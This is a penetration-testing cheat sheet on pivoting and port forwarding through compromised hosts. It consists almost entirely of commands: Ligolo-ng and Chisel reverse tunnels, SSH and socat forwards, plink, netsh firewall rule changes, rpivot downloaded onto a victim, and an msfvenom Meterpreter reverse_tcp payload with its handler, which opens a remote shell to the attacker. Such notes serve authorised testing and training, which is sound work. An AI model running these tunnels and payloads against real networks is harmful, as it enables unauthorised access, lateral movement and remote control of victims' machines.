Pivoting / Forwarding

00. Basic Enumerations

## ------------------| Check arp table
arp -an

01. Port Forwarding

01.0 Ligolo-ng

## ------------------| Agent [target/victim computer]
.\agent.exe -connect <MyIP>:11601 -ignore-cert 

## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
session 
ifconfig 
sudo ip route add <IPRange>/24 dev ligolo
start
nmap <IP>

01.1 SSH Port Forward

##  -N   Do not execute a remote command.  This is useful for just forwarding ports.
~C # do it as very first command

## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>

## 3306 is victim's machine port 
## 1337 is our machine port 
ssh> -L 1337:127.0.0.1:3306 
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>

## 3306 is victim's machine port 
## 1337 is our machine port 
ssh -R 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Dynamic Port Forward (Use of proxychain)
ssh> -D 1080
socks5 127.0.0.1 1080 

## Config proxychain
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
## 1337 is our machine port 
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>
## Launch nmap
proxychains nmap -sT 172.16.1.0/24

01.2 Socat Multipurpose relay

socat TCP-LISTEN:4444,fork TCP:0.0.0.0:631
socat TCP-LISTEN:4444,fork,bind=10.10.14.26 TCP:127.0.0.1:3306

01.3 Using Chisel

## ------------------| Normal
## Server side
./chisel server --reverse --port 1234 
## Client side
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001 

## ------------------| SOCKS5 (With Proxychains)
## Server side
chisel server --reverse --port 1234
## Client side
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf 
socks5   127.0.0.1   1080
## Use nmap with proxychains

01.4 Using sshuttle

## ------------------| For all routes
sudo sshuttle -vvr root@10.10.110.100 0/0
sudo sshuttle -vr root@10.10.110.100 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/24 --ssh-cmd "ssh -i ./id_rsa"

## ------------------| For specific route
sudo sshuttle -vr root@10.10.110.100 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"

01.5 Using ncat tunnel

## ------------------| Set ncat for target machine
ncat -vv --listen 1337 --proxy-type http

## ------------------| Edit on the attacker machine (10.10.110.100 is the IP of my ssh machine)
echo "http\t 10.10.110.100 \t1337" >> /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf

## ------------------| Then use proxychains
proxychains nmap -sT 172.16.1.0/24

01.6 Using httptunnel

## ------------------| On Server
hts --forward-port localhost:3306 1337

## ------------------| On Client
htc --forward-port 3306 <compromised_ip>:1337

01.7 Using Plink.exe

cp /usr/share/windows-resources/binaries/plink.exe .

.\plink.exe root@<OURIP> -R 445:127.0.0.1:455

cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.01:3306 <our_ip>          

01.8 Using netsh.exe

## 3306 is victim's machine port 
## 1337 is compromised machine port 
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>                  

## Add firewall rule
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=4545 action=allow

01.9 Using rinetd

## ------------------| Forword my google.com traffic to resticted device
sudo vi /etc/rinetd.conf
### Jump to line number 19 and add following line
0.0.0.0    80    <GoogleIPAddress>    80
### Restart service
sudo service rinetd restart

### Success ? (on resticted machine)
nc -znv <AttackerIP> 80   

01.10 Using rpivot.exe [Best for Windows XP]

## ------------------| Start server on attacker machine
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989

## ------------------| Start rpivot on compromised machine
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989

## ------------------| Proxy
/etc/proxychains.conf
socks4	127.0.0.1	1080
proxychains nmap -sT -p 80 <IP>

01.11 Using Metasploit with Meterpreter

## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin    

## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i

## ------------------| Methord 0x01
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run

## ------------------| Methord 0x02
## !! You must be on " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
    ## -l (8003) is listening us
    ## -p (3306) this port running on compromised machine
    ## -r (172.17.0.1) compromised ip address
    ## then you can use 127.0.0.1:8003 from your end